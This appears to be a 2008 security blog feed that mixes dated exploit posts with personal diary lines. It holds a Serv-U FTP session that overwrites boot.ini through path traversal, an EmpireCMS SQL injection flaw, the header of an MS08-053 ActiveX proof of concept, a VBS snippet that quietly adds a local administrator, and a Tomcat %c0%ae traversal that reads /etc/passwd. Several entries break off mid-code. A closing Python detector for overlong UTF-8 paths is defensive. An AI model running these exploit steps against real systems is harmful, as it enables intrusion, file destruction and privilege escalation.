2008-10-04 16:40
#Serv-U 7.2.0.1 ftp file replacement
#user must have upload permissions
#
#(x) dmnt 2008-10-01
220 Serv-U FTP Server v7.2 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 File or directory exists, ready for destination name.
rnto ..\..\..\boot.ini
250 RNTO command successful.
#boot.ini rewritten
2008-09-28 19:18
EmpireCMS (帝国ECMS) /e/member/list/index.php injection vulnerability
The EmpireCMS /e/member/list/index.php file:
if($sear)
{
$keyboard=RepPostVar2($_GET['keyboard']);
if($keyboard)
{
$add.=$where.$user_username." like '%$keyboard%'";
}
$search.="&sear=1&keyboard=$keyboard";
}
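The code checks whether the sear parameter is present, then reads the keyboard parameter directly, then checks whether the keyboard value is empty; if it is not empty, keyboard is placed straight into the query, which produces the injection vulnerability.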
2008-09-22 15:40
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='target'></object>
2008-09-14 18:51
<html>
<pre>
=============================================================================
MS08-053 Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow
=============================================================================
Calc execution POC Exploit for WinXP SP2 PRO English / IE6.0 SP2
Found by : Nguyen Minh Duc and Le Manh Tung
Advisory : http://www.microsoft.com/technet/security/Bulletin/MS0
2008-08-28 15:59
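After reading dream's question today, this suddenly came to mind.
In its Active Directory part, VBS has a winnt object that is used to manage local resources; with it, an administrator can be added without relying on CMD or similar commands.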
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","abc")
od.SetPassword "123"
od.SetInfo
Set of=GetObject(os
2008-08-23 10:45
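Lately I always seem to be muddle-headed, and yesterday this kind of thing happened again; I feel I have let everyone down. Well, I will take a break for a while and concentrate on learning wireless network penetration.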
2008-08-20 15:58
2008-08-14 14:12
I'm 16 now. Sigh................ the person who should have come didn't come, so what is the point of eating this meal??
Never mind........ cheer up, kid..
You are best !
2008-08-12 17:32
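Apache Tomcat has a vulnerability similar to the IIS URL encoding vulnerability of years past.
The vulnerability occurs when Apache Tomcat handles UTF-8 encoding: it does not convert correctly, so a URL containing %c0%ae%c0%ae is converted into something like ../, which makes it possible to traverse to arbitrary files on the system, including /etc/passwd.
The trigger condition is that 'allowLinking' and 'URIencoding' in Apache Tomcat's configuration file context.xml or server.xml allow the 'UTF-8' option.
The vulnerability test code is as follows: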
Dim strUrl,strSite
showB()
Set Args = Wscript.Arguments
If Args.Count <> 1 Then
ShowU()
Else
str
2008-08-12 12:25
Title: Apache Tomcat Directory Traversal Vulnerability
Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)
Severity: High
Impact: Remote File Disclosure
Vulnerable Version: prior to 6.0.18
Solution:
- Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org)
- Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order to avoid this vulnerability.
- Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next releases. Please apply the hot fix unt
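
For servers that cannot be upgraded yet, request paths can be screened for the overlong UTF-8 forms behind this issue. The following is an added example, not code from the advisory or from Tomcat; the function names and sample paths are constructed for illustration. It flags overlong sequences such as %c0%ae and shows what a non-validating decoder would turn them into.

```python
import re
from urllib.parse import unquote_to_bytes

# Overlong forms: 2-byte lead C0/C1, 3-byte E0 80..9F, 4-byte F0 80..8F.
OVERLONG = re.compile(
    rb"[\xc0\xc1][\x80-\xbf]|\xe0[\x80-\x9f][\x80-\xbf]|\xf0[\x80-\x8f][\x80-\xbf]{2}"
)

def lenient_utf8(data: bytes) -> str:
    """Decode the way a non-validating UTF-8 decoder would (accepts overlong forms)."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            n, cp = 0, b
        elif b >> 5 == 0b110:
            n, cp = 1, b & 0x1F
        elif b >> 4 == 0b1110:
            n, cp = 2, b & 0x0F
        elif b >> 3 == 0b11110:
            n, cp = 3, b & 0x07
        else:
            n, cp = 0, 0xFFFD  # stray continuation byte or invalid lead
        tail = data[i + 1:i + 1 + n]
        if len(tail) < n or any(t >> 6 != 0b10 for t in tail):
            n, cp, tail = 0, 0xFFFD, b""  # truncated or malformed sequence
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        out.append(chr(cp) if cp < 0x110000 else "\ufffd")
        i += 1 + n
    return "".join(out)

def inspect_path(raw_path: str) -> dict:
    """Flag overlong bytes and show what a lenient decoder would hand to the file layer."""
    data = unquote_to_bytes(raw_path)
    lenient = lenient_utf8(data)
    return {
        "overlong": bool(OVERLONG.search(data)),
        "dotdot_after_decode": ".." in re.split(r"[/\\]", lenient),
        "lenient": lenient,
    }

# Constructed request paths (not taken from any real log).
SAMPLES = ["/docs/index.html", "/caf%c3%a9/menu.html",
           "/files/%c0%ae%c0%ae/secret.txt", "/a/%e0%80%ae%e0%80%ae/b"]

if __name__ == "__main__":
    for path in SAMPLES:
        print(path, inspect_path(path))
```

A strict decoder rejects these byte sequences outright, so a path that only becomes ".." under the lenient decode is a reliable signal for logging or blocking at a reverse proxy.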